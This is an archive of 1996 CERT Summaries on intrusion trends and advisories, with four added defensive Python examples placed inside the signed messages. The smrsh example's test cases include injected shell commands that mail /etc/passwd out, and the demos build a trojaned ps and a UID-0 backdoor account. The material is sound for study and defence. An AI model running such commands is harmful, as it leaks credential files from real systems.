CERT summaries 96' (CERTSummaries96.sit.hqx, Freaks Macintosh Archive, Textfiles/cert; PGP signed message, archived 1997-01-21, 56KB, 1,599 lines)
-----BEGIN PGP SIGNED MESSAGE-----
- ---------------------------------------------------------------------------
CERT(sm) Summary CS-96.01
January 23, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
strategic incident response staff. The summary includes pointers to
sources of information for dealing with the problems. We also list new
or updated files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Recent Activity
- ---------------
In the last two months we have seen the same types of activity that we
described in the CERT advisory CA-95:18 Widespread Attacks on Internet
Sites. If you have not yet taken steps to protect your site against
the activities described below, we urge you to do so as soon as
possible.
Description
Intruders are doing the following:
- using automated tools to scan sites for NFS and NIS vulnerabilities
- exploiting the rpc.ypupdated vulnerability to gain root access
- exploiting the loadmodule vulnerability to gain root access
- installing Trojan horse programs and packet sniffers
- launching IP spoofing attacks
Solution
The CERT staff urges you to immediately take the steps described in
the advisories referenced below. Note that it is important to
periodically recheck these files as they contain updated
information received after the advisory was published.
a. Using automated tools to scan sites for NFS and NIS vulnerabilities
* CA-94:15.NFS.Vulnerabilities
* CA-92:13.SunOS.NIS.vulnerability
b. Exploiting the rpc.ypupdated vulnerability to gain root access
* CA-95:17.rpc.ypupdated.vul
c. Exploiting the loadmodule vulnerability to gain root access
* CA-93:18.SunOS.Solbourne.loadmodule.modload.vulnerability
* CA-95:12.sun.loadmodule.vul
d. Installing Trojan horse programs and packet sniffers
* CA-94:01.ongoing.network.monitoring.attacks
e. Launching IP spoofing attacks
* CA-95:01.IP.spoofing
The CERT advisories are available from
ftp://info.cert.org/pub/cert_advisories
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (November 28,
1995).
* New Additions
ftp://info.cert.org/pub/
Sysadmin_Tutorial.announcement (This CERT course will be given
four times this year in Pittsburgh,
Pennsylvania, USA.)
ftp://info.cert.org/pub/cert_advisories/
CA-95:16.wu-ftpd.vul
CA-95:17.rpc.ypupdated.vul
CA-95:18.widespread.attacks
ftp://info.cert.org/pub/cert_bulletins/
VB-95:10.elm
VB-95:10a.elm (listed additional FTP sites)
* Updated Files
ftp://info.cert.org/pub/
cert_faq
ftp://info.cert.org/pub/cert_advisories/
CA-95:13 (syslog - added info from Digital Equipment)
CA-95:15 (SGI lp - added info)
CA-95:16 (wu-ftpd - added clarification and Solaris 2.4 info)
CA-95:17 (rpc.ypupdated - added vendor info for Digital & HP)
ftp://info.cert.org/pub/tech_tips/
AUSCERT_checklist1.1 (replaced AUSCERT checklist version 1.0)
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCsXHVP+x0t4w7BAQHfBgQAuo/+ApxplmfDVxE0O6IahjhJmzKO28M8
X4Hx+BtfZycxe3WgT7mHVTN4iIl2n8k4d1PAUJZGdzhYe7kjiH2auiVUEruR9fQC
aREps8J2gn1BWWUijWuVWMQZ8n0IRmeRseJu1Fa17oz93QnKThPD4H31O8+fj6Jh
Pzgs8THUUX4=
=3+Ic
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
- ---------------------------------------------------------------------------
CERT(sm) Summary CS-96.02
March 26, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
strategic incident response staff. The summary includes pointers to
sources of information for dealing with the problems. We also list new
or updated files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Recent Activity
- ---------------
In the two months since the last CERT Summary, we have continued to
receive reports about the same types of activities that were described
in CERT advisory CA-95:18 Widespread Attacks on Internet Sites. In
addition, we have seen an increase in the number of reports relating
to software piracy, many of which involve intruders taking advantage
of systems with poorly configured anonymous FTP areas.
If you haven't done so already, the CERT staff urges you to
immediately take the steps described in the advisories listed below.
Note that it is important to periodically recheck these files, as they
can contain updated information that we receive after an advisory is
published.
The majority of the incidents reported to our incident response staff
during the last two months fit into one (or more) of these seven
categories:
1. Root compromise on systems that are unpatched or running old OS versions.
We receive daily reports of systems that have been compromised by
intruders who have gained unauthorized access to root or other
privileged accounts by exploiting widely known security vulnerabilities
on systems that did not have appropriate patches installed (and/or
systems that were running old [unpatched] versions of the operating
system).
We encourage everyone to check with their vendor(s) regularly for
updates or new patches that relate to their systems, and install
security-related patches as soon as they are available.
For a list of additional suggestions on recovering from a UNIX root
compromise, see
ftp://info.cert.org/pub/tech_tips/root_compromise
2. Compromised user-level accounts that are leveraged to gain further access.
We receive daily reports of compromised accounts that have been used to
launch attacks against other sites, and/or have been used to gain
privileged access on vulnerable systems.
We encourage you to check your systems regularly (in accordance
with your site policies and guidelines) for any signs of unauthorized
accesses or suspicious activity.
For a list of suggestions on how to determine whether your system may
have been compromised, see
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
3. Packet sniffers and Trojan horse programs
We continue to receive almost daily incident reports about intruders who
have installed packet sniffers on root-compromised systems. These
sniffers, used to collect account names and passwords, are frequently
installed as part of a widely-available kit that also replaces common
system files with Trojan horse programs. The Trojan horse binaries
(du, ls, ifconfig, netstat, login, ps, etc.) hide the intruders'
files and sniffer activity on the system on which they are installed.
For further information and methods for detecting packet sniffers and
Trojan horse binaries, see the following files:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/cert_advisories/CA-94:05.MD5.checksums
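The detection method CA-94:05 describes is a checksum baseline: record the MD5 of each binary from clean media, keep that record off the host, and compare the live system against it. The script below is an added illustration of that procedure written for this summary; it is not a CERT tool and not the cpm program listed later. The directory, file contents and the trojaned "ps" and setuid "ls" in the demo are constructed for the example.

```python
"""Added example: verifying system binaries against a trusted checksum baseline."""
import hashlib
import os
import tempfile

# Binaries the sniffer/rootkit kits of the period typically replaced.
WATCHED = ("du", "ls", "ifconfig", "netstat", "login", "ps")


def digest_file(path, algo="md5", chunk=65536):
    """Hash a file in chunks so large binaries need not fit in memory.

    MD5 is what CA-94:05 recommended in 1994; pass algo="sha256" today.
    """
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(bindir, names=WATCHED):
    """Record (digest, size, mode) for each watched binary present in bindir.

    Run this from clean media, and keep the result off the host (read-only
    media or another machine): a baseline stored on the compromised system
    can be edited by the intruder along with the binaries.
    """
    baseline = {}
    for name in names:
        path = os.path.join(bindir, name)
        if os.path.exists(path):
            st = os.stat(path)
            baseline[name] = (digest_file(path), st.st_size, st.st_mode & 0o7777)
    return baseline


def audit(bindir, baseline):
    """Compare bindir against a baseline; return a list of (name, finding) pairs."""
    findings = []
    for name, (digest, size, mode) in baseline.items():
        path = os.path.join(bindir, name)
        if not os.path.exists(path):
            findings.append((name, "missing"))
            continue
        st = os.stat(path)
        if digest_file(path) != digest:
            findings.append((name, "checksum mismatch"))
        elif st.st_size != size:
            findings.append((name, "size changed"))
        if (st.st_mode & 0o7777) != mode:
            findings.append((name, "mode changed to %o" % (st.st_mode & 0o7777)))
    return findings


def demo():
    """Constructed scenario: a clean tree, then a trojaned 'ps' and a setuid 'ls'."""
    with tempfile.TemporaryDirectory() as bindir:
        for name in WATCHED:
            with open(os.path.join(bindir, name), "wb") as fh:
                fh.write(b"#!/bin/sh\necho pretend-%s\n" % name.encode())
            os.chmod(os.path.join(bindir, name), 0o755)
        baseline = build_baseline(bindir)
        # Intruder replaces ps with a version that hides the sniffer process ...
        with open(os.path.join(bindir, "ps"), "wb") as fh:
            fh.write(b"#!/bin/sh\n/bin/ps \"$@\" | grep -v sniffer\n")
        # ... and leaves ls setuid as a back door.
        os.chmod(os.path.join(bindir, "ls"), 0o4755)
        return sorted(audit(bindir, baseline))


if __name__ == "__main__":
    for name, finding in demo():
        print("%-10s %s" % (name, finding))
```

The comparison is only as trustworthy as the tools that perform it: a trojaned "ls" or a modified kernel can lie to the checker, so on a suspect machine run the audit from a boot medium or a statically linked copy of the checker, as the advisory suggests.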
4. IP spoofing attacks
We continue to receive several reports each week of IP spoofing
attacks. Intruders attack by using automated tools that are becoming
widespread on the Internet. Some sites incorrectly believed that they
were blocking such spoofed packets, and others planned to block them but
hadn't yet done so.
For further information on this type of attack and how to prevent it,
see
ftp://info.cert.org/pub/cert_advisories/CA-95:01.IP.spoofing
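CA-95:01's countermeasure is a rule at the border: a packet arriving from the Internet must not carry a source address belonging to the site, and (as a courtesy to other sites) a packet leaving must not carry one that does not. The following added example, written for this summary and not taken from the advisory or any router vendor, models that rule so a site can test its own understanding of it against sample traffic; the interface names, address blocks and packets are constructed.

```python
"""Added example: the anti-spoofing ingress/egress rule from CA-95:01 as code."""
import ipaddress

# Assumed site addressing for the demo.
INTERNAL = [ipaddress.ip_network("192.0.2.0/24")]
# Sources that are never legitimate on the wire from outside.
BOGONS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "0.0.0.0/8")]


def _in(addr, nets):
    return any(addr in n for n in nets)


def filter_packet(iface, src, dst):
    """Return (verdict, reason) for a packet seen on interface iface.

    iface is "ext" for the Internet side or "int" for the site side.
    The test is on the SOURCE address: checking only that the destination
    is one of ours is the mistake that lets spoofed packets through.
    """
    src = ipaddress.ip_address(src)
    dst = ipaddress.ip_address(dst)
    if _in(src, BOGONS):
        return ("drop", "bogon source")
    if iface == "ext":
        # Ingress: an outside packet claiming an inside source is spoofed.
        if _in(src, INTERNAL):
            return ("drop", "spoofed internal source on external interface")
        return ("accept", "inbound")
    if iface == "int":
        # Egress: do not let our users spoof other sites either.
        if not _in(src, INTERNAL):
            return ("drop", "non-internal source leaving site")
        return ("accept", "outbound")
    return ("drop", "unknown interface")


def audit(packets):
    """Apply filter_packet to (iface, src, dst) tuples; return the dropped ones."""
    dropped = []
    for pkt in packets:
        verdict, reason = filter_packet(*pkt)
        if verdict == "drop":
            dropped.append((pkt, reason))
    return dropped


SAMPLE = [  # constructed traffic
    ("ext", "198.51.100.7", "192.0.2.10"),   # normal inbound
    ("ext", "192.0.2.5", "192.0.2.10"),      # spoofed: inside source from outside
    ("ext", "127.0.0.1", "192.0.2.10"),      # loopback source from outside
    ("int", "192.0.2.10", "198.51.100.7"),   # normal outbound
    ("int", "203.0.113.9", "198.51.100.7"),  # our host spoofing someone else
]

if __name__ == "__main__":
    for pkt, reason in audit(SAMPLE):
        print(pkt, "->", reason)
```

The model deliberately ignores TCP flags and sequence numbers: the point of the advisory is that the address check alone stops the attack at the perimeter, before any TCP-level trickery matters.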
5. Software piracy
We receive new reports each week about compromised accounts and/or
poorly configured anonymous FTP servers that are being used for
exchanging pirated software. While the compromised accounts should be
addressed as a separate security issue (see item 2, above), the abuse of
anonymous FTP areas for software piracy activities can be reduced if the
anonymous FTP service is correctly configured and administered.
For related information and guidelines for configuring anonymous FTP,
see
ftp://info.cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity
6. Sendmail attacks
We still receive new reports each week about intruders attempting to
exploit vulnerabilities in the sendmail program mailer facility.
Unfortunately, some of these attacks have been successful against sites
that are running old versions of sendmail and/or are not restricting the
sendmail program mailer facility. Sendmail's program mailer facility can
be restricted by using the sendmail restricted shell program (smrsh).
Information on known sendmail vulnerabilities and the smrsh tool can be
obtained from
ftp://info.cert.org/pub/cert_advisories/CA-93:16.sendmail.vulnerability
ftp://info.cert.org/pub/cert_advisories/CA-93:16a.sendmail.vulnerability.supplement
ftp://info.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities
ftp://info.cert.org/pub/cert_advisories/CA-95:08.sendmail.v.5.vulnerability
ftp://info.cert.org/pub/cert_advisories/CA-95:11.sun.sendmail-oR.vul
ftp://info.cert.org/pub/cert_advisories/CA-95:13.syslog.vul
The smrsh program can be obtained from:
ftp://info.cert.org/pub/tools/smrsh/
smrsh is also included in the sendmail 8.7.5 distribution.
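What smrsh actually enforces is easy to state: it is invoked as the program mailer's shell with "-c command", refuses the command if it contains shell metacharacters, discards any directory part of the program name, and runs the program only if a file of that name exists in a fixed directory of approved mailers (/usr/adm/sm.bin in the smrsh of this period). The following added example, written for this summary and not derived from the smrsh source, models that policy so the effect of each rule can be seen; the metacharacter set is an assumption based on smrsh's documented behaviour, and the sm.bin contents are constructed.

```python
"""Added example: a model of the sendmail restricted shell (smrsh) policy."""
import os
import shlex
import tempfile

# Characters the model refuses to pass to a shell (assumed set, modelled on smrsh).
FORBIDDEN = set("`<>|;&$^\r\n")


def smrsh_check(argv, smbin):
    """Decide what smrsh would do with argv like ["-c", "prog args"].

    Returns (allowed, reason). Real smrsh execs /bin/sh -c with the
    rewritten command on success; this model only decides.
    """
    if len(argv) != 2 or argv[0] != "-c":
        return (False, "usage: smrsh -c command")
    cmd = argv[1]
    bad = FORBIDDEN & set(cmd)
    if bad:
        return (False, "shell metacharacter(s) %s rejected" % sorted(bad))
    try:
        words = shlex.split(cmd)
    except ValueError as exc:
        return (False, "unparsable command: %s" % exc)
    if not words:
        return (False, "empty command")
    prog = os.path.basename(words[0])   # /usr/adm/sm.bin/../../bin/sh -> sh
    target = os.path.join(smbin, prog)
    if not (os.path.isfile(target) and os.access(target, os.X_OK)):
        return (False, "%s is not in %s" % (prog, smbin))
    return (True, "would exec %s %s" % (target, " ".join(words[1:])))


def demo():
    """Constructed sm.bin in which only 'vacation' and 'procmail' are approved."""
    with tempfile.TemporaryDirectory() as smbin:
        for name in ("vacation", "procmail"):
            p = os.path.join(smbin, name)
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
            os.chmod(p, 0o755)
        cases = [
            "/usr/ucb/vacation joe",                  # approved mailer, path stripped
            "/usr/local/bin/procmail -f joe",         # approved
            "/bin/sh -c 'cat /etc/passwd | mail x'",  # metacharacter, and sh not approved
            "vacation joe; mail x < /etc/passwd",     # approved program, but metacharacters
            "/usr/adm/sm.bin/../../bin/sh",           # path trick: basename is sh
        ]
        return [(c,) + smrsh_check(["-c", c], smbin) for c in cases]


if __name__ == "__main__":
    for cmd, ok, why in demo():
        print("%-5s %s\n      %s" % ("ALLOW" if ok else "DENY", cmd, why))
```

The last two cases are why the advice above says to run smrsh regardless of sendmail version: the program mailer is reachable through ordinary mail delivery (.forward files and aliases), so every program a user can name there is effectively a network service.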
7. NFS and NIS attacks, and automated tools to scan for vulnerabilities
We receive weekly reports of intruders using automated tools to scan
sites for hosts that may be vulnerable to NFS and NIS attacks.
Intruders are continuing to exploit the rpc.ypupdated vulnerability to
gain root access, and intruders are still exploiting widely known
vulnerabilities in NFS to gain root access.
For related information, see
ftp://info.cert.org/pub/cert_advisories/CA-95:17.rpc.ypupdated.vul
ftp://info.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities
ftp://info.cert.org/pub/cert_advisories/CA-92:13.SunOS.NIS.vulnerability
What's New at the CERT Coordination Center
- ------------------------------------------
The CERT Coordination Center has a new Web site. It includes
information on Internet security and has a link to the CERT FTP
archive.
http://www.cert.org
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (January 23,
1996).
* New Additions
ftp://info.cert.org/pub
incident_reporting_form v.3 (replaced v.2 with v.3)
ftp://info.cert.org/pub/cert_advisories
CA-96.01.UDP_service_denial
CA-96.02.bind
CA-96.03.kerberos_4_key_server
CA-96.04.corrupt_info_from_servers
CA-96.05.java_applet_security_mgr
CA-96.06.cgi_example_code
ftp://info.cert.org/pub/cert_bulletins
VB-96.01.splitvt
VB-96.02.sgi
VB-96.03.sun
VB-96.04.bsdi
ftp://info.cert.org/pub/FIRST
conference.info
ftp://info.cert.org/pub/tech_tips
root_compromise
ftp://info.cert.org/pub/tools
/cpm/* (replaced older version with v.1.2)
/sendmail/sendmail.8.7.5 (replaced older version)
/tcp_wrappers/tcp_wrappers_7.3 (replaced older version)
/sendmail/smrsh/* (replaced older version with v.8.4)
ftp://info.cert.org/pub/vendors
/sgi/SGI_contact_info
* Updated Files
ftp://info.cert.org/pub
cert_faq (version 10.2)
ftp://info.cert.org/pub/cert_advisories
CA-94:01 (added info about cpm v.1.2)
CA-95:13 (added info from sendmail author and Cray; added
info from HP and Sun)
CA-95:14 (added info from NEC Corp and Silicon Graphics)
CA-95:17 (added info from IBM)
CA-96.01 (new URL for Argus; added info from Silicon Graphics)
CA-96.02 (added info from IBM, Solbourne, and Silicon
Graphics)
CA-96.03 (added new checksums and patch info; added
info from Transarc and TGV Software, Inc.)
CA-96.04 (added info from Silicon Graphics)
CA-96.05 (added pointer to Netscape 2.01)
rdist-patch-status (added pointer to version 6.1.2)
ftp://info.cert.org/pub/vendors
/hp/HP.contact.info
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
URLs: http://www.cert.org/
ftp://info.cert.org/pub/
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCtFXVP+x0t4w7BAQGqMwP8Da/27XOhG+hWDqO69XiYxTXFQUrDPkKz
5KaHbMjEKnCj1pu1zt71cNdxCj6zz4fpfRxGqPdORkwLvl7glgWjxtW3bhRJVje3
ytdb8Us0fLwQ+zZnkfgkTJa5MNwCLGwF3ntLpupWH+9yJBZd5taZ+rIleb12tRFb
Jw7H7y2bNjM=
=YDeN
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
- ---------------------------------------------------------------------------
CERT(sm) Summary CS-96.03
May 22, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
We have changed the way we sign CERT publications.
Before May 20, 1996, we put our PGP signature in a separate .asc file,
which was available for anonymous FTP.
As of May 20, 1996, the CERT PGP signature is in the document itself.
CS-96.03 (this summary), VB-96.06, and VB-96.07 are signed this way. The first
advisory to be signed this way will be CA-96.10, which has not yet been
released.
In addition, we have removed the .asc files from past publications and
re-signed them in the text.
You can get the CERT public key from PGP Public Key Servers and from
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Recent Activity
- ---------------
Since the March CERT Summary, we have seen these continuing trends in
incidents reported to us.
1. Password files and cracking
We have seen an increase in incidents in which intruders obtain
password files from sites and then try to compromise accounts by
cracking passwords. Once intruders gain access to a user account, they
attempt to gain root access through a cracked root password or by
exploiting another vulnerability.
These incidents point to the need for system administrators to address
three areas:
- Protect your password file so an intruder cannot obtain a
copy of it.
- Ensure that good passwords are selected so that they cannot
easily be cracked, or use a technology where passwords
are not located in the password file.
- Ensure that you are up to date with security patches and
workarounds and watch for unusual activity.
To learn more about these problems, see the following file:
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
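The three points above translate into checks an administrator can script: are hashes sitting in a file every user can read, are there accounts with no password at all, and has anything unexpected (a second UID 0, a duplicate name) appeared in the file since the last look. The script below is an added example written for this summary, not the passwd_file_protection tech tip or any vendor tool; the passwd lines are constructed, and the hash in the "bob" entry is an arbitrary 13-character string standing in for a crypt(3) hash.

```python
"""Added example: auditing a passwd(5) file for the exposures described above."""
from collections import Counter

# Values found in the password field when the real hash lives in a shadow file
# or the account is locked (assumed list covering common UNIX variants).
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", "*LK*", "NP"}


def parse_passwd(text):
    """Parse passwd lines into dicts; return (entries, problems) for malformed lines."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            problems.append((lineno, "malformed entry (%d fields)" % len(fields)))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        try:
            uid, gid = int(uid), int(gid)
        except ValueError:
            problems.append((lineno, "non-numeric uid/gid for %s" % name))
            continue
        entries.append(dict(line=lineno, name=name, pw=pw, uid=uid,
                            gid=gid, home=home, shell=shell))
    return entries, problems


def audit_passwd(text, mode=0o644):
    """Return (severity, message) findings. mode is the file's permission bits."""
    entries, problems = parse_passwd(text)
    findings = [("warn", "line %d: %s" % (n, m)) for n, m in problems]
    for e in entries:
        if e["pw"] == "":
            findings.append(("crit", "%s has an empty password" % e["name"]))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("crit", "%s has UID 0" % e["name"]))
    # Point 1 above: hashes readable by everyone can be copied and cracked offline.
    exposed = [e["name"] for e in entries
               if e["pw"] != "" and e["pw"] not in SHADOW_PLACEHOLDERS]
    if exposed and mode & 0o004:
        findings.append(("crit", "%d hash(es) readable by every user (%s): "
                         "move them to a root-only shadow file"
                         % (len(exposed), ", ".join(exposed))))
    for name, n in Counter(e["name"] for e in entries).items():
        if n > 1:
            findings.append(("warn", "duplicate account name %s" % name))
    return findings


SAMPLE = """\
root:x:0:0:root:/:/bin/sh
daemon:*:1:1::/:/bin/false
alice:x:1001:100:Alice:/home/alice:/bin/csh
bob:abJnggxhB/yWI:1002:100:Bob:/home/bob:/bin/sh
guest::1003:100:Guest:/tmp:/bin/sh
toor:x:0:0:backdoor:/:/bin/sh
alice:x:1004:100:dup:/home/alice2:/bin/sh
broken:x:abc:100:::/bin/sh
"""  # constructed sample

if __name__ == "__main__":
    for severity, message in audit_passwd(SAMPLE, mode=0o644):
        print("[%s] %s" % (severity, message))
```

Compare the output of two runs with mode=0o644 and mode=0o600: the exposed-hash finding only disappears when the file is no longer world-readable, which is what point 1 asks for and what shadow password packages achieve by moving the hashes out of /etc/passwd altogether. Point 2 (choosing good passwords) is not something a file audit can check; that needs a cracker run against your own file, with management's agreement.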
2. Linux machines
We have seen an increase in break-ins and root compromises of Linux
machines. In some cases, the intruders are installing packet sniffers
on Linux machines. If you use Linux on your machines,
we recommend that you keep up to date with patches and security
workarounds. We also recommend that you review
ftp://info.cert.org/pub/cert_advisories/CA-94:01.ongoing.network.monitoring.attacks
The advisory describes sniffers, suggests approaches for addressing
the problem, and contains information that was added after the
advisory was issued.
We also recommend that you monitor the Linux newsgroups and mailing
lists for security patches and workarounds. Additionally, a World Wide
Web page that some sites reference is
http://bach.cis.temple.edu/linux/linux-security
Note that this reference should not be construed as a formal
endorsement of the page or its contents. We are simply including it in
this summary so that our readers are aware of its existence; you may
evaluate it as appropriate to your situation.
3. Machines being probed to find known vulnerabilities
We continue to get reports of machines being probed for known vulnerabilities.
In many cases, these sites did not have up-to-date security patches and the
machines were compromised at the root level.
In some cases, the intruders are using the Internet Security Scanner (ISS).
These intruders frequently use ISS on a large range of IP addresses and then
use the information collected to compromise vulnerable computers.
So that you can determine if your machines are vulnerable to the problems that
ISS examines, you may wish to run ISS against your own site (in accordance
with your organization's policies and procedures). ISS is available from
ftp://info.cert.org/pub/tools/iss/iss13.tar
We also encourage you to take relevant steps discussed in these documents:
ftp://info.cert.org/pub/cert_advisories/CA-93:14.Internet.Security.Scanner
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
ftp://info.cert.org/pub/tech_tips/packet_filtering
4. Mail spoofing and mail bombing
We have seen a large increase in the number of reports concerning
email spoofing, bombing, and spamming. To learn more about dealing
with these issues, see the files:
ftp://info.cert.org/pub/tech_tips/email_bombing_spamming
ftp://info.cert.org/pub/tech_tips/email_spoofing
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (March 26,
1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.07.java_bytecode_verifier
CA-96.08.pcnfsd
CA-96.09.rpc.statd
ftp://info.cert.org/pub/cert_bulletins/
VB-96.05.dec
VB-96.06.freebsd
VB-96.07.freebsd
ftp://info.cert.org/pub/tech_tips
root_compromise
anonymous_ftp_abuses
email_bombing_spamming
email_spoofing
passwd_file_protection
* Updated Files
ftp://info.cert.org/pub/cert_advisories/
CA-94:04
CA-94:09
CA-95:01 (added a pointer to Argus)
CA-95:13
CA-96.02
CA-96.06 (added info from another response team)
CA-96.07 (added a pointer to Netscape 2.02)
CA-96.08 (updated fix info that was in the original Appendix B)
CA-96.09 (added info from TGV/Cisco, a workaround for SunOS 4.s,
and a clarification)
CA-96.13 (added info from the Santa Cruz Operation)
ftp://info.cert.org/pub/tech_tips
anonymous_ftp_config (file name changed)
ftp://info.cert.org/pub/tools
/ValidateHostname (replaced older version of IsValid.c and updated the
README)
ftp://info.cert.org/pub/vendors
/sgi/SGI_contact_info (added URL for SGI Security Web pages)
Keeping Current
- ---------------
Often during the course of our work, we learn about software upgrades
that fix security problems. In a new section of our FTP archive we
list these upgrades, their sources, and their MD5 checksums.
ftp://info.cert.org/pub/latest_sw_versions/
If you use any of the software listed in this directory, we recommend
that you upgrade to the current versions. Among other changes, these
new versions address security weaknesses present in previous versions.
If you have any questions about the software listed in this directory,
please contact the vendor for more information.
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCtvnVP+x0t4w7BAQGPxwP+OXm4mGzeNJ5boL2GLh/ba8PaLlW0YE5q
d43gdRhmSuT66PtOwrCG9zqwhuomHbRKTbifS9KVVfWDQaDUtGYEAuEWFL9CT0D4
/qh3RO7TrBiQ2sgZoakOpdXXkc3qjqrj9voMk/N9dPWd8WiVxp3Ujzc26sadxydB
9G8fLVqEYW4=
=DEop
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
- ----------------------------------------------------------------------------
CERT(sm) Summary CS-96.04
July 23, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Increasing Sophistication of Intruder Community Expertise
- ---------------------------------------------------------
In earlier summaries, we noted that the intruder community was
analyzing operating system source code to develop increasingly
sophisticated and effective exploitation techniques. The intruder
community is now developing new techniques to analyze programs for
potential vulnerabilities even in the absence of source code. This can
be done with a tool that traces system calls and subroutine calls
within a program, thus allowing a person to match such calls against
command line parameters.
Although there is little that sites can do in direct response to this
information, it does highlight the importance of staying up to date
with security patches and workarounds for your operating systems and
applications.
Operating System Concerns
- -------------------------
We receive reports relating to incident activity from many different
sites using a wide variety of operating systems. Because of problems
we see that directly relate to operating systems, we felt it
worthwhile to make a few observations about choosing an operating
system. For information on this subject, see
ftp://info.cert.org/pub/tech_tips/choose_operating_sys
Forged Advisories
- -----------------
Occasionally, we see forged advisories on various newsgroups or other
distribution lists. If you have the Pretty Good Privacy (PGP) program,
you can determine whether or not an advisory is genuine by checking
the PGP signature.
We use PGP to sign all our advisories. To verify that a CERT advisory
is authentic,
1. Get the CERT public key from
